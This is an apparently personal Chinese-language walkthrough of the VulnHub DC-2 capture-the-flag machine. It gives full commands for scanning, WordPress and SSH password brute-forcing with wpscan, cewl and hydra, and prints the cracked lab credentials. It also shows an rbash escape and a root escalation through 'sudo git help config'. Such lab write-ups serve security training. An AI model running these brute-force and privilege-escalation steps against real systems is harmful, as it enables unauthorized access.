实战受挫虐靶机之DC-2

目录

前言

1.靶机环境介绍

2.实战DC-2靶机

2.1 信息收集

2.2 靶机实验-flag1

2.2 靶机实验-flag2

2.3 靶机实验-flag3

2.4 靶机实验-flag4  

2.5 靶机实验-flag5

---

前言

已经有一段时间没有搞站了，因为一个人要管一整个某个***云的安全加运维，有时候真的有一些负面的情绪，难道所谓的奋斗就是把趁着年轻多做一些脏活累活吗？以甲方为主的目的是尽全力去实现他们要求的业务需求，不是外包的保姆机构。说多了都是泪，假装日个站吧！！！！！！

1.靶机环境介绍

本靶机是由著名的靶机提供商vulnhub提供，官网连接请点击（https://www.vulnhub.com/），想做就去找吧，这里面啥靶机都有。

本靶机镜像地址：https://www.vulnhub.com/entry/dc-2,311/

本次实验使用虚拟机vmware 16 ，靶机DC-2,攻击机kali。

2.实战DC-2靶机

2.1 信息收集

实战搞靶机一定要搞清楚知识点......，本次靶机共有5个知识点，需要获取5个flag

基本信息探测，域名访问，暴力破解（利用用户密码获取网站后台），系统提权，获取root权限
使用工具netdiscover扫描IP地址

 sudo netdiscover -i eth0 -r 192.168.163.1/24 # 扫描IP网段信息

 获取了IP信息以后进一步获取IP地址包含的其他信息

sudo nmap -v -sV -sS -A -p- 192.168.163.115

 访问地址192.168.163.115会出现地址（dc-2），根据IP扫描的结果出现[http-title:Did not follow redirect to http://dc-2/]，由此判断需要手动配置hosts文件

配置hosts文件，攻击机使用的kali，kali上该文件的目录为[/etc/hosts]

 当再次访问dc-2的时候就会出现这个页面

 至此flag1的提示信息如下所示，下列的文字提示需要我们使用cewl生成一个字典，也提示了flag的位置

2.2 靶机实验-flag1

目录扫描

此步骤是本人基本上必做的一步，有时候能收集到很多的信息

dirb http://dc-2/

获取到了敏感目录：http://dc-2/wp-login.php?redirect_to=http%3A%2F%2Fdc-2%2Fwp-admin%2Fnetwork%2F&reauth=1

 根据信息收集发现网站使用了开源CMS（wordpress），使用kali集成的wpscan工具，先来爆破一波用户名

wpscan -e u --url http://dc-2 

通过扫描获取了三个用户名 

使用cewl生成密码

cewl是一个密码攻击工具，采用ruby开发，爬取指定url的信息，可以调整爬行的深度，结果会返回一个单词列表，可以使用生成的列表对网站后台登录口进行爆破。

cewl http://dc-2/ -d 3 > dc-2.txt # -d参数是指定爬行的深度，生成密码字典dc-2.txt

然后使用刚才获取的用户名保存为一个用户名字典（dc-2-user.txt），然后开始爆破，最终的爆破结果如下。

wpscan --url http://dc-2 --passwords /home/jietewang/dc-2.txt --usernames /home/jietewang/dc-2-user.txt

 [!] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

使用获取到的用户名密码登录后台，发现了flag2的提示信息

2.2 靶机实验-flag2

在上一步已经完成了flag1，并且获取了flag2的信息

提示的内容为如果不能利用WordPress的话，这儿有另一种方法，希望你能寻找到其他切入点，根据前文中利用nmap扫描端口获取到的信息，发现主机开放了ssh端口为7744，尝试爆破一波。 

使用hydra工具进行爆破，发现存在用户名（tom）和密码（parturient）

hydra -L /home/jietewang/dc-2-user.txt -P /home/jietewang/dc-2.txt -vV -o ssh.log -e ns ssh://192.168.163.115:7744 

# 参数详解 

-L 指定用户名文件

-P 指定密码文件

-v/V 打印爆破的详情

-o 将爆破结果保存为ssh.log文件

-e 空密码探测和指定用户名探测(ns)

ssh.log文件内容

使用爆破结果登录受害主机

ssh tom@192.168.163.115 -p 7744

成功登录目标主机，但是显示rbash（受限bash），需要绕过该限制

tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a

$ export PATH=$PATH:/bin/

$ export PATH=$PATH:/usr/bin

$ /bin/bash # 可退出该shell

2.3 靶机实验-flag3

根据前面的工作发现了flag3的相关信息，并获得了一些提示。

这段话翻译为：可怜的老汤姆总是追杰瑞。也许他应该为自己造成的压力负责。

2.4 靶机实验-flag4  

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

完全不懂这句话的意思，但是看到了su这两个字母，想到了使用su切换用户，切换到jerry用户下，并在其家目录下找到flag4。

2.5 靶机实验-flag5

根据前文flag4的提示，大致翻译为好样的看到你做到这么远，但你仍然没有学到家。你依旧需要得到最终的flag（唯一的flag是真正的标志），没有提示了这儿，你是要依靠你自己了现在。继续-git outta here！！！！

这一步是需要来提权的，首先需要收集一波信息查找系统上运行了SUID可执行文件，执行如下命令。

find / -perm -u=s -type f 2>/dev/null 

 发现了可以其执行sudo命令，执行sudo -l命令，发现不需要密码可以使用git命令

sudo git help config #在末行命令模式输入 
!/bin/bash 或 !'sh' #完成提权 
sudo git -p help #可使用这个命令查看提示信息，也可以作为提权前后的对比

找到了最终的flag了，结束！！！！